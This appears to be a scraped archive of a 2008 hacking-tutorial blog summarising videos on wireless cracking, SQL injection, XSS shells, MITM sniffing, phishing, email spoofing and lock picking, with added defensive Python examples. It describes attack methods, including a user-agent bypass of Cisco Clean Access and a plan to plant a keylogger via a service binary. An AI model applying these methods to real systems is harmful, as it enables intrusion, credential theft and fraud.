Search Hacking Mode Trick Updates

Wireless Hacking - Cracking WEP

Friday, December 5, 2008

The second episode of Full Disclosure is now released. This episode includes how to crack WEP encryption, and why it is so easy to crack. The show notes are published in the wireless hacking section of the forums.

Download video here

Wireless Hacking - DeAuth

The third episode of Full Disclosure is a short one; however, it is a necessary step in cracking WPA-PSK, which will be our next video. Basically this attack just disconnects all the users on a wireless network. The attacker does not need to know the WEP or WPA key or be connected to the network. This attack is illegal in many states, so this video is for educational purposes only.

Download video here

Lock Picking - Bump Key

This is the first of our Lock picking series. In this episode we describe how to make and use a bump key to quickly unlock most residential grade locks.

Download video here (Right Click -> Save Link as)
Video Shownotes here



Phone Phreaking - Beige Box

In this episode of Full Disclosure we demonstrate how to tap a phone line with the old-school Beige Box! We are planning to have many Phone Phreaking (telephone hacking) episodes, like Sniffing VoIP, Hacking COCOT, and Red Boxing, to name a few.


Download video here (Right Click -> Save Link as)



Phone Phreaking/Network Hacking - Sniffing VoIP

Our seventh episode is a mix between Phone Phreaking and Network Hacking. In this episode we demonstrate how to sniff Voice Over IP conversations, which basically means how to tap an internet phone. We thought that this would be a good video to follow the beige box.


Lock Picking - DIY Padlock Shims

This is our second video in our Lock picking series. In this video we explain how to make and use Padlock Shims. Padlock Shims are used to unlock spring latch Padlocks.

Download video here (Right Click -> Save Link as)

Lock Picking - Multi-Disc Combo Locks

This is our third video in our Lock Picking series; after this video we will return to computer hacking videos for a while. In this video we demonstrate how to unlock the Master Lock 653D, Targus Defcon CL, and the Master Lock 175. The different methods shown in this video to unlock these three locks will not only help you unlock these locks, but also help you develop your own way to crack other multi-disc combo locks that you may come across.

Download video here (Right Click -> Save Link as)

Local Privilege Escalation Vulnerability in Cisco VPN Client

Recently a local privilege escalation vulnerability was found in Cisco’s VPN Client. When Cisco VPN Client is installed, a Windows service, “Cisco Systems, Inc. VPN Service”, is created. The service runs the binary C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe as Local System. Therefore, if you replace cvpnd.exe with another executable, that program will be run at startup with root privileges! I found this vulnerability interesting because it is used at my college to authenticate students when they connect to the wireless network. For that reason, almost every student with a laptop has this software installed, and students are allowed to borrow school laptops from the student center to use the wireless internet. Consequently, anyone could borrow a laptop, gain root access through the vulnerability, and install a keylogger that sends every keystroke to the attacker’s email! It’s been 5 days since this vulnerability was discovered, and Cisco has already issued a patched version. However, how long will it take for the school to update all their computers? This is just another reason why you should be careful when using school computers!
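A defender-side check for this class of problem, added here as an example and not taken from the original post or from Cisco: it parses icacls output for the service binary and flags write-capable rights held by unprivileged principals. It assumes the replacement is possible because of the file's ACL (the post does not say so), and both ACL listings below are constructed samples.

```python
import re

# Path of the service binary, as given in the post.
SERVICE_BINARY = r"C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe"

# Principals that every ordinary logged-on user belongs to.
UNPRIVILEGED = {
    "everyone",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}
# icacls rights that allow rewriting, deleting or re-permissioning the file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DE", "WDAC", "WO", "GA", "GW"}
# Inheritance markers that icacls prints in the same parenthesised syntax.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<perms>(?:\([^)]*\))+)$")


def parse_icacls(output, path):
    """Return [(principal, set_of_rights)] from the output of `icacls <path>`."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        # The first ACE shares its line with the file path.
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        match = ACE_RE.match(line)
        if not match:
            continue  # blank line or the "Successfully processed" summary
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", match.group("perms")):
            rights.update(r.strip().upper() for r in group.split(",") if r.strip())
        aces.append((match.group("who").strip(), rights - INHERIT_FLAGS))
    return aces


def risky_aces(output, path):
    """List (principal, rights) pairs that let a non-admin replace the binary."""
    findings = []
    for who, rights in parse_icacls(output, path):
        if "DENY" in rights:
            continue  # a deny entry grants nothing
        granted = rights & WRITE_RIGHTS
        if who.lower() in UNPRIVILEGED and granted:
            findings.append((who, sorted(granted)))
    return findings


# Constructed sample: an ACL that lets any interactive user modify the file.
WEAK_ACL = r"""C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe NT AUTHORITY\INTERACTIVE:(M)
                                                    BUILTIN\Administrators:(F)
                                                    NT AUTHORITY\SYSTEM:(F)
                                                    BUILTIN\Users:(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample: the same file with read/execute only for ordinary users.
FIXED_ACL = r"""C:\Program Files\Cisco Systems\VPN Client\cvpnd.exe BUILTIN\Administrators:(F)
                                                    NT AUTHORITY\SYSTEM:(F)
                                                    BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for label, acl in (("weak", WEAK_ACL), ("fixed", FIXED_ACL)):
        print(label, risky_aces(acl, SERVICE_BINARY))
```

The same check applies to any binary that a service launches as Local System, since whoever can write the file controls what the service runs.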

Video Demonstration: (shows how to gain root access and change the Admin password with this vulnerability)


Hacking Basics - MD5

In this episode of Full Disclosure we will demonstrate how to crack MD5 password hashes. MD5 (Message-Digest algorithm 5) is a hash function commonly used by websites to protect stored passwords. MD5 is a one-way hash; therefore, to crack the password you must try every possible dictionary word and, if that does not work, every possible letter/number/symbol combination. The programs we use to crack the passwords are Cain and MDCrack-NG.
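Why plain MD5 is a poor way to store passwords, shown from the site owner's side as an added example (not code from the episode): an audit that finds which unsalted MD5 records match a wordlist, next to a salted PBKDF2 store. The user names, passwords and wordlist are constructed, and PBKDF2-HMAC-SHA256 is a choice made for this example.

```python
import hashlib
import hmac
import os


def md5_hex(password):
    """Unsalted MD5, the storage scheme the post describes."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def recoverable(stored, wordlist):
    """Audit: map each user whose MD5 record matches a wordlist entry to that word.

    One pass over the wordlist builds a table that covers every account at
    once, because equal passwords always produce equal unsalted hashes.
    """
    table = {md5_hex(word): word for word in wordlist}
    return {user: table[h] for user, h in stored.items() if h in table}


def hash_password(password, iterations=600_000):
    """Salted, deliberately slow hash; returns the record to store."""
    salt = os.urandom(16)  # unique per account
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_password(password, record):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), record["salt"], record["iterations"]
    )
    return hmac.compare_digest(candidate, record["digest"])


# Constructed sample data.
WORDLIST = ["123456", "password", "letmein", "dragon"]
USERS = {"alice": "letmein", "bob": "letmein", "carol": "T7#vq-Lm29!xRw"}


def demo(iterations=600_000):
    """Store the same users both ways and return (md5_store, kdf_store)."""
    md5_store = {user: md5_hex(pw) for user, pw in USERS.items()}
    kdf_store = {user: hash_password(pw, iterations) for user, pw in USERS.items()}
    return md5_store, kdf_store


if __name__ == "__main__":
    md5_store, kdf_store = demo()
    print("identical MD5 records:", md5_store["alice"] == md5_store["bob"])
    print("matched by wordlist:", recoverable(md5_store, WORDLIST))
    # A weak password is still guessable under PBKDF2, but every guess must be
    # repeated per account (different salts) and costs `iterations` hash rounds.
    print("identical PBKDF2 records:",
          kdf_store["alice"]["digest"] == kdf_store["bob"]["digest"])
    print("login check:", verify_password("letmein", kdf_store["alice"]))
```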


Download video here (Right Click -> Save Link as)



Website Hacking - Sql Injection

For Infinity Exists Full Disclosure’s first Website Hacking episode, we demonstrate how to exploit a security vulnerability occurring in a website’s database to extract password hashes. Sql (Structured Query Language) is a computer language designed for the retrieval and management of data in a system’s database. The Attack, known as Sql Injection, manipulates Sql statements before they are sent to the Sql Server, allowing the Attacker to create, change, or retrieve data stored in the database. Sql Injection is a hard concept to understand, so we made a video that encompasses all our knowledge on the subject to make it easier for our viewers to grasp.


Download video here (Right Click -> Save Link as)



Hacking Basics - Backtrack

On the forums, there have been many questions concerning Backtrack. Therefore, we decided to make a video that tries to answer as many of these questions as possible. In this episode we cover: where to get Backtrack 2, how to burn an .ISO file, how to boot Backtrack 2, how to log in, and how to start the GUI. Also, we illustrate basic Linux commands and how to set up your network interfaces.


Download video here (Right Click -> Save Link as)



How to use Intel Pro/Wireless 3945ABG in Backtrack 2

The Intel Pro/Wireless 3945ABG (IPW3945) is a popular wireless card that is built into many laptops. However, the drivers included in Backtrack 2 do not allow you to do packet injection. To fix this problem you need to install the IPWRAW drivers. The easy way to do this is to use a Backtrack 2 module. A module adds additional components to Backtrack 2. To add a module, you copy the .LZM file into the modules folder in the BT2 .ISO. After adding the IPWRAW module to the BT2 .ISO, boot up Backtrack and click the “IPW3945 RAW load.sh” script on the desktop to install the IPWRAW drivers. After the drivers are installed your wireless card will be locked in monitor mode, and you will be able to do packet injection with aireplay-ng. If you want to put your wireless card in managed mode and connect to a wireless network, click the “IPW3945 load.sh” script on the desktop. That script will load the default IPW3945 drivers.

Video Demonstration


Download IPWRAW Module Here
Discuss Here

Credit:
IPWRAW package made by: -~operator~-
Module made by: Genius


Sql Injection Challenge!

I’m proud to announce the first Infinity Exists’ Hacking Challenge! The challenge is to find a Sql Injection flaw in our forums, and exploit it to extract password hashes. The first person to complete this challenge will receive a free Infinity Exists T-shirt. The Sql Injection vulnerability is hidden deep in Infinity Exists’ forums, and will be much harder to find than the vulnerability demonstrated in Full Disclosure Episode 11. Tips to help you get started:

  1. Watch Full Disclosure Episode 11!
  2. Download Wp-Forums Source Code
  3. The variable that is used to manipulate the Sql Statement is a POST variable.
Good Luck!
—————————————————————————————————————————–
Update!
marcel.romard and esc both won Infinity Exists’ Sql Injection Challenge!! Marcel.romard found the Sql injection flaw in the forum’s search that this challenge was based around. Esc found a Sql Injection flaw that we were unaware of in the forum’s RSS feed. Congrats to both of you!

Sql Injection Challenge How-to

The Sql Injection Challenge has already been completed, so here is a video demonstration on how to find this Sql Injection flaw and exploit it to extract password hashes. In this video I use a Firefox plugin, ‘Data Tamper’, that can be downloaded here.


Full Size Video
Download Here

SIUC’s Network

I currently attend Southern Illinois University at Carbondale, and I am taking Digital Circuit Design with Dr. Weng, who also teaches Network Processing Systems Design. Today in class he invited all his students to go on a tour of SIUC’s computer network with his Network Processing Systems class. Of course I took up his offer because it is not every day a regular student can walk into the core networking room and server mainframe of a large University. Basically, the network is set up on a three layer infrastructure (Core Layer, Distribution Layer, Access Layer). At the Access Layer (which is the layer that provides network access to client computers) the University uses Cisco Catalyst 2950 switches. Those switches are connected via cross-over cable to the Distribution Switch, which is a Cisco Catalyst 3524. In turn, the Distribution switch connects via fiber wire to the Core Switch, which is a Cisco Catalyst 6509. The entire network runs at 1 Gigabyte; however, the internet bandwidth is capped at 300 Mb! Furthermore, only 90 Mb of bandwidth is dedicated to the Residence Halls!! All the Core Switches go to the student center where the internet point of entry is located. Also, internet traffic is filtered through a SourceFire firewall. Some more interesting networking facts: SIUC has 9 Wireless AP (I believe) which are managed by a Cisco Wireless LAN Controller, for access control they use Cisco 1111, for VPN they use Cisco VPN Concentrator 3000, and for their servers they use Sun System SunFire. An interesting security fact is that they only use SSH to configure switches remotely because the web interface has security issues. Lastly, you probably noticed that most of their networking devices are Cisco; this is for compatibility reasons, as they had problems in the past using multiple vendors. Well that’s about it, hope you enjoyed hearing about SIUC’s Network.

Typical Network Layout of a SIUC Building:

My Dorm’s Network Layout:

Infinity Exists Featured On 60 Minutes

CBS’s 60 Minutes ran a segment on internet insecurities and they showed the ease of finding tutorials on YouTube to exploit them. They chose our video on cracking WEP to demonstrate and showed a short clip of it. The segment is up on the CBS website and you can check it out here. Thank you CBS for the free publicity!
—————————————————————————————————————————– Update - Live Stream



Website Hacking - XSS

In this episode of Full Disclosure we are explaining the website attack known as Cross-Site Scripting (XSS). Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website. Cross-Site Scripting is most commonly used to steal cookies. Cookies are used for authenticating, tracking, and maintaining specific information about users; therefore, by stealing a user’s cookies an attacker could bypass the website’s access control. There are three types of XSS attacks: Persistent, Non-Persistent, and DOM-Based. In this episode we will cover Persistent and Non-Persistent Cross-Site Scripting attacks.


Download video here (Right Click -> Save Link as)

The 60 Minutes Effect

As most of you already know, Infinity Exists’ Full Disclosure Ep. 2 Wep Cracking was featured on CBS’s 60 Minutes “High-Tech Heist” for about 10 seconds. Those few seconds on national television gave us about 40,000 hits on YouTube, and about 750 unique hits on InfinityExists.com. Weeks after the 60 Minutes episode aired, Infinity Exists is still getting an average of 300 unique hits a day. This is pretty good compared to our 200 hit average before.



However, 60 Minutes brought Infinity Exists to the attention of a few unwanted people. For Example:



People that do not understand what it is to be a hacker simply think we are criminals. A Hacker truly is a computer enthusiast that enjoys exploring various computer systems in the pursuit of more knowledge. A hacker’s goal is never to harm anyone or anything as the media would like you to believe. The goal of Infinity Exists’ video series Full Disclosure is to inform people about specific security flaws. If there was no one to disclose this information to the general public then everyone would still be using insecure technology and would be at the mercy of criminal crackers.

Exploit Hacking

Since Infinity Exists hasn’t had time to release a new episode, I decided to revamp a two part series, Exploit Hacking and Exploit Hacking 2 - Privilege Escalation, that I made a year before Infinity Exists was created. It may be a little dated, but it provides great information on how a hacker can find a vulnerability on a remote computer and exploit it to gain remote access. Also, the video shows how a hacker can raise their privileges on the remote machine to administrator. I added text throughout the video to make it easier to understand. Furthermore, Infinity Exists plans to do a more up-to-date and more detailed series of episodes on “exploit hacking.”


Full Scale Video Here
Download Here

USB Worm (Jamesgo.dll)

The other day my computer was infected by a USB Worm known as Jamesgo.dll. I received the virus when I inserted my girlfriend’s USB thumb drive. The worm modified the autorun.inf file on the thumb drive, so it was able to automatically transfer itself to all my hard disk drives (Click Here to view autorun.inf). There is little information on the internet about this virus, so I had to figure out my own way to remove it. By analyzing the autorun.inf (which the virus cleverly changed to a system hidden file, and later I found out that it modified the registry so system hidden files are never displayed) I discovered that each drive contains the Visual Basic Script, test.vbs (Click Here to view Test.vbs). Basically what the file does is copy test.bat, test.reg, autorun.inf, autorun.ico, and itself to every hard disk in the system. Also, it runs every 60 seconds, so if you delete it from one drive, in 60 seconds it will recopy itself from a different drive. Furthermore, the test.reg simply edits the registry so test.bat runs on start up and prevents system hidden files from being displayed. Test.bat runs the VB script and changes the files to system, hidden, archived, and read-only (Click Here to view Test.reg and Click Here to view Test.bat). To remove the virus I crafted a batch file that changes all the test files and autorun to normal files (attrib -s -h -r test.*, attrib -s -h -r autorun.*), and then deletes them. Since the batch file can delete all the files quickly, it does not have a chance to recopy itself to all the disk drives. Also, I manually removed all entries of test.bat from the registry (Click Here to view Fix).
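The manual inspection described above can be scripted. The following is an added example, not the author's fix script: it parses autorun.inf in each drive root and reports the worm files named in the post. The autorun.inf contents and the temporary directories standing in for drives are constructed, since the post's real files are only linked.

```python
import os
import tempfile

# File names the post attributes to the worm (besides autorun.inf itself).
WORM_FILES = ["test.vbs", "test.bat", "test.reg", "autorun.ico"]

# Constructed sample of an autorun.inf that launches a script from the drive root.
SAMPLE_AUTORUN = (
    "[AutoRun]\n"
    "; constructed sample, not the worm's real file\n"
    "open=wscript.exe test.vbs\n"
    "shell\\open\\command=wscript.exe test.vbs\n"
    "icon=autorun.ico\n"
)


def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_targets(entries):
    """Keep only the entries that make Windows start a program."""
    return [
        (key, value)
        for key, value in entries.items()
        if key in ("open", "shellexecute")
        or (key.startswith("shell\\") and key.endswith("\\command"))
    ]


def scan_root(root):
    """Inspect one drive root and return a report dict."""
    # os.listdir also returns hidden and system files, which Explorer may not show.
    names = {name.lower(): name for name in os.listdir(root)}
    launch = []
    if "autorun.inf" in names:
        path = os.path.join(root, names["autorun.inf"])
        with open(path, errors="replace") as fh:
            launch = launch_targets(parse_autorun(fh.read()))
    referenced = [f for f in WORM_FILES if any(f in v.lower() for _, v in launch)]
    return {
        "root": root,
        "launch": launch,
        "worm_files": sorted(n for n in names if n in WORM_FILES),
        "suspicious": bool(referenced),
    }


def build_sample_roots(base):
    """Create two constructed 'drive roots' under base: one infected, one clean."""
    infected, clean = os.path.join(base, "E"), os.path.join(base, "F")
    os.makedirs(infected)
    os.makedirs(clean)
    with open(os.path.join(infected, "autorun.inf"), "w") as fh:
        fh.write(SAMPLE_AUTORUN)
    for name in WORM_FILES:
        open(os.path.join(infected, name), "w").close()
    with open(os.path.join(clean, "autorun.inf"), "w") as fh:
        fh.write("[autorun]\nicon=setup.ico\nlabel=Backup\n")
    return [infected, clean]


def demo():
    """Scan every sample root in one pass, as all drives must be checked together."""
    with tempfile.TemporaryDirectory() as base:
        return [scan_root(root) for root in build_sample_roots(base)]


if __name__ == "__main__":
    for report in demo():
        print(report["root"], report["suspicious"], report["launch"], report["worm_files"])
```

On a real machine, pass every mounted drive root to scan_root in the same run, because the post notes the worm recopies itself from any drive that was missed.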

To prevent a USB Worm from infecting your computer:
1) Go to Start -> Run
2) Type “gpedit.msc” (This is the group policies editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”


In conclusion, the Jamesgo.dll USB Worm is not a risk for your computer, but it is really annoying! Also, it is a perfect example of how easy it is to create a worm that travels through removable media. If you want to mess around and modify the Jamesgo.dll script you can download it here. If you want to learn more on how to use Autorun and Batch files to create an “Auto Hacking USB Thumb Drive” go here.

Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.

Staying Secure - SSH Tunnel

The wait is finally over! This new episode of Full Disclosure shows you how to use an SSH Tunnel to secure your data when you are on an untrusted LAN (ex. Coffee Shop, School’s network, or Defcon). Furthermore, you can use the SSH Tunnel to bypass the LAN’s internet filters. The SSH tunnel protocol works by encapsulating your data into an encrypted payload and transmitting it to the SSH Server, which is set up on a trusted LAN.

Live Stream Here
Download Here

Links:
OpenSSH for Windows, Putty, Proxifier

Wireless Hacking - Cracking WPA

This episode of Full Disclosure illustrates the process of cracking weak WPA Preshared Keys. Before you can crack the Preshared Key you must capture the four way handshake between the Access Point and a client; to accomplish this you must force the client to reconnect to the AP with the DeAuthentication attack we showed in episode 3. If you are using the Linksys WUSB54GC you will have to update your drivers to the RaLink RT73 USB Enhanced Driver. In this episode we show you how to do this, and I also made a Backtrack module to automate the process. The module works in the same way as the IPWRAW Module for the Intel Pro/Wireless 3945ABG card, so you can watch that Vblog if you are having troubles.

Live Stream Here
Download Here

Download RT73 Module Here
Watch IPWRAW Vblog Here

Singing Tesla Coil

This weekend was UIUC’s annual Engineer Open House, and last night there was a Singing Tesla Coil show. The Tesla coils were built by Steve Ward, an EE student at UIUC. “Steven has developed Tesla Coils with high levels of control allowing audio modulation of their lightning-like display. Interfacing the Continuum Fingerboard with this technology will generate a musically expressive and highly energetic, multi-voiced performance” (EOH Exhibit Guide).

Full Scale Video Here
Download Here

McAfee SiteAdvisor

An anonymous viewer brought to my attention that McAfee’s so called “SiteAdvisor” had labeled Infinityexists.com with the big evil red X

It turns out that McAfee SiteAdvisor scanned Infinity Exists and found the Jamesgo.dll Worm, which I uploaded so you guys can see how it works. Not only is the virus zipped to prevent anyone from accidentally running it, but also, there is an explanation on how to remove the virus in the blog post.

(I have to agree with the Nuisance ‘O Meter. Jamesgo is definitely an 8!)

Don’t get me wrong, I think it is a good idea for McAfee to try to inform non-techie computer users that those free screensavers are going to mess up their computer. I just think McAfee should take into account the content of the website instead of just blindly scanning the internet for viruses. Now people interested in computer hacking will be disinclined to visit Infinity Exists because they’ll see this:

Well anyways, that’s my rant on McAfee SiteAdvisor.

Tapping a 66 Block Telephone Network Interface

A while ago I was asked to rewire a company’s 66 Block, a type of punchdown block used to connect sets of wires in a telephone system, because they wanted to replace their plain old telephone service (POTS) with multiple VoIP telephone lines. I had little knowledge of the 66 Block before doing this job, so I got out my trusty Beige Box to figure out how it was wired. Here’s a short video on how to tap a 66 Block. (Watch Episode 6 if you need help making a Beige Box)

Full Scale Video Here
Download Here

Triple Boot - Windows, Backtrack, & Ubuntu

For episode 17, we demonstrate how to triple boot a computer with Windows, Backtrack, and Ubuntu. Nox and I go through the process of setting up the various disk partitions, installing Backtrack and Ubuntu to different partitions, and how to configure your computer to boot between each of the Operating Systems. Hopefully, this episode will give you guys insight on how to go about multibooting your computer with several different OSs.

Live Stream Here
Download Here

Download Backtrack
Download Ubuntu

Dual Boot - Windows & Backtrack

We said we would release a Vblog on how to dual boot Windows and Backtrack, so here it is. The process is slightly different: there is no need for an extended partition because you only need four primary partitions, and we use Lilo for the boot loader. Since we aren’t installing Ubuntu we have to manually create and configure the Linux swap partition. Also, we have to manually configure Lilo; however, this allows us to change the splash image when your computer starts.

Full Scale Video Here
Download Here

Local Password Cracking

In this edition of Full Disclosure, Nox and I show you how to crack local Linux and Windows passwords. Furthermore, we explain how to reset and restore a Linux or Windows password for temporary access to a computer. There are different trade-offs for each method of bypassing local passwords. Cracking a password can take a long time, but knowing the password may help you gain access to other computers and programs. Resetting and restoring a password is quick because you don’t need to know the password, but you will have to repeat this method every time you want access to the computer.

Live Stream Here
Download Here

Ophcrack
Cain

Introduction

Infinity Exists Underground is a new video series based completely on viewer submissions. If you have an educational video on hacking, lock picking, modding, etc. send an email explaining what your video is about to underground@infinityexists.com. Nox and I will review the emails and if it sounds like a good informative video we will give you access to the video upload page so you can submit your video. We may edit your video slightly to make it clearer, but you will get credit for creating the video. Also, you can remain anonymous if you are making a questionable video. We hope to get many viewer submissions so that we can get more content on the site and also get you guys more involved.

Full Scale Video Here
Download Here

Lock Picking Basics

Our 19th video is a continuation of our lock picking series. In this episode, we explain how to pick a deadbolt lock using the Lifter Picking method.

Live Stream here
Download video here

Email Spoofing

The first Underground video explains how to send fake emails, a.k.a. Email Spoofing. This video, submitted by Crash Overron, covers two methods of email spoofing. The first and older method is connecting directly to the SMTP server with Telnet; however, this method is usually blocked by the email provider. The second method utilizes the mail() function in PHP.

Full Scale Video Here
Download Here

Download Email_Spoof.php
(Right Click -> Save As Email_Spoof.php)

Metasploit Autopwn

In this Underground Video, Copy explains how to use Metasploit’s Autopwn. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. Autopwn is a tool in Metasploit Framework version 3 that automates the exploitation process. Copy demonstrates how to use Autopwn in both Backtrack 2 and Backtrack 3.

Full Scale Video Here
Download Here

The Metasploit Project
For more information on the Metasploit Framework check out my Exploit Hacking video.

Recovering an Acer Computer

Last Thursday, my Acer Travelmate laptop crapped out on me and stopped booting Windows XP. I tried everything to fix it: booting into safe mode, using Windows recovery console to fix the boot.ini, fixing the corrupted partition boot sector with Fixboot, and fixing the Master boot record with Fixmbr. I even tried to reinstall Windows, but it still wouldn’t boot! So I decided I would just backup all my stuff with a liveCD, format the drive, and use the recovery CD to start all over. Guess what? Acer doesn’t ship their laptops with a Recovery CD; they require you to burn it yourself when you first get the computer, and of course I was way too lazy to do that. Well after some research I found out there is a hidden recovery partition that the Acer repair people use to fix your computer. If you are having the same problem as me, here’s how I accessed the hidden partition and recovered my computer.

1. Boot your computer with the Backtrack liveCD (I used BT2 because it was the only thing I had off hand)
2. Backtrack will automatically mount the hidden drive (sda1). Navigate to it in the /mnt/sda1 folder.
3. Copy mbrwrwin.exe and rtmbr.bin from the /mnt/sda1 folder to the /mnt/sda2 folder (your C drive).
4. Next, you need to run the mbrwrwin install rtmbr.bin command. You can do this a couple different ways: You can use the Windows Recovery Console to run the command, or use a Windows LiveCD like BartPE (http://www.nu2.nu/pebuilder/). I used BartPE because I already tried to re-install windows and I couldn’t access the recovery console because I wasn’t able to set an Administrator password.
5. Restart your computer, and press Alt-F10 at the Acer splash screen. This will bring you to the Acer eRecovery on the hidden partition, and all you have to do is follow the directions to restore the factory settings. (If you can’t access the eRecovery make sure d2d recovery is enabled in BIOS. You can access the BIOS by pressing F2 at the Acer splash screen).
6. After your computer is restored, burn the damn recovery cd so you don’t have to do this next time!!!

For more information check out:
http://forum.notebookreview.com/showthread.php?t=175697
http://forum.notebookreview.com/showthread.php?t=11476

Application Patching

Crash Overron’s second Underground video explains how to use OllyDbg to manipulate a simple program. OllyDbg is a debugger that analyzes binary code. Not only does Olly allow you to step through an executable’s assembly code, but it can also trace registers and recognize procedures, API calls, switches, tables, constants and strings. Crash Overron utilizes a feature in Olly to locate a referenced text string that is displayed when an invalid serial key is entered. Once the string is located, he can find the compare statement that checks the user’s serial key, and change the flow of the program so that his serial key is accepted.

Full Scale Video Here
Download Here

Download OllyDbg
Download Application

Ettercap

For this episode of Full Disclosure, we illustrate the many features of Ettercap. Ettercap is a program designed to sniff passwords on a LAN. It can recognize several different packets that contain passwords including Http, Telnet, Ftp, Pop, Rlogin, SSH1, ICQ, SMB, MySql, NNTP, X11, IRC, IMAP, VNC, SNMP, MSN, YMSG, etc. Furthermore, Ettercap can utilize Man in the Middle Attacks to hijack packets and redirect them to the attacker’s computer, allowing it to extract passwords. In this episode, we show you how to use Arp Poisoning, DHCP Spoofing, and Port Stealing MITM Attacks and explain how they work. Also, we explain how to configure Ettercap to sniff encrypted passwords over the Secure Sockets Layer (SSL and HTTPS). Moreover, Ettercap can be easily programmed to modify network traffic with the use of Filters. We demonstrate how to make many different Ettercap Filters. Ettercap comes with numerous plugins to advance Ettercap’s abilities; we explain how to use the Check Poison, Re-Poison, DNS Spoofing, Isolate, DoS Attack, Find IP, Gateway Discover, Search Promisc, Arp Cop, and Scan Poisoners Plugins. Lastly, we demonstrate how to use Ettercap’s Passive OS Fingerprinting feature. Ettercap supports passive dissection of many protocols, allowing it to identify a host’s Operating System and Services.

Live Stream Here
Download Here

This Full Disclosure episode is very lengthy, almost 50 minutes, so if you have any questions feel free to ask them on the forums

Download Ettercap (Linux)
Download Ettercap (Windows)

Filters:
Irongeek’s Image Altering Filter
Patchy’s Wordpress Filter
Patchy’s Myspace Filter

Windows SMB Relay Exploit

In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB), which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploit Framework to run the exploit. It works by relaying an SMB authentication request to another host, which provides Metasploit with an authenticated SMB session, and if the user is an administrator, Metasploit will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform an SMB authentication attempt by using an Ettercap Filter.

Full Scale Video Here
Download Here
Download Ettercap Filter Here

Beer Pong Table

The last few days I’ve been helping my friend Charlie construct his Illinois State University (ISU) Beer Pong Table. The legs and supports of the table are made from his roommate Brandon’s hockey sticks, and the table top is made of plywood with a 1/8″ sheet of Acrylic on top. Our friend Tyler etched ISU’s mascot, Red Bird, into the Acrylic; it was done free-hand with a dremel (Compare his etching to image). Tyler also did the text on the table: “ISU” and “What you call Addiction … We call Dedication”. I did the LED array and the wiring; when the LEDs are lit, the light catches the etching in the acrylic. The LED controller I made allows you to switch between the LEDs being constantly on or controlled by an audio input. However, the LEDs we used are only lit at a specific voltage, so it doesn’t work very well.

Full Scale Video Here
Download Here
Pre-Amp Schematic

XSS Tunnel

XSS Shell is a cross-site scripting backdoor into the victim’s browser that enables an attacker to issue commands and receive responses. During a normal XSS attack an attacker has only one chance to control a victim’s browser; XSS Shell, however, keeps the connection between the attacker and the victim open so the attacker can continuously manipulate the victim’s browser. XSS Shell works by setting up an XSS Channel, an AJAX application embedded into the victim’s browser, that can obtain commands and send back responses. To enable XSS Shell, an attacker needs to inject XSS Shell’s JavaScript reference by exploiting an XSS flaw on a website. Once the victim’s browser is infected with XSS Shell and the XSS Channel is created, the attacker can issue instructions to the infected browser. The attacker can also use an XSS Tunnel to transfer HTTP traffic through the XSS Channel and the victim’s browser, in turn exploiting the victim’s credentials to bypass authentication and IP restrictions. The XSS Tunnel is an HTTP proxy that sits on the attacker’s computer, and any tool that is configured to use it will tunnel its traffic through the XSS Channel.

Live Stream Here
Download Here

Download XSS Shell and Tunnel

Password Phishing

Phishing is a method of obtaining sensitive information such as usernames and passwords by pretending to be a trusted website. Tehdead shows us a variety of password phishing techniques that enable an attacker to trick a user into giving up their login information. The first step is to create a fake login identical to the login on the trusted website. In order not to raise suspicion, Tehdead explains two methods to capture the victim’s password and then pass the victim on to the real website. One method is to submit the information to a PHP page that is disguised as a pop-up advertisement, and the other is to send the username and password to a similar PHP page that is contained in an iframe. Lastly, Tehdead describes how to use link manipulation with BBcode to social engineer a victim into going to the fraudulent website.
Full Scale Video Here
Download Here

Bypass Cisco Clean Access & Cisco NAC Appliance

Cisco NAC Appliance (formerly Cisco Clean Access) is a Network Admission Control (NAC) product that is used to enforce security policy on computers seeking to access network resources. An administrator can therefore force users to comply with a policy that requires the user to install or remove programs. For example, a university I previously attended required students to install McAfee Antivirus Software and remove Peer-to-Peer programs before they were allowed to access the internet.

To bypass Cisco Clean Access a user can simply change their browser’s User Agent to an Operating System that does not require this program [ex. Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.8) Gecko/20050511]. An easy way to change your User Agent in Firefox is to download User Agent Switcher.

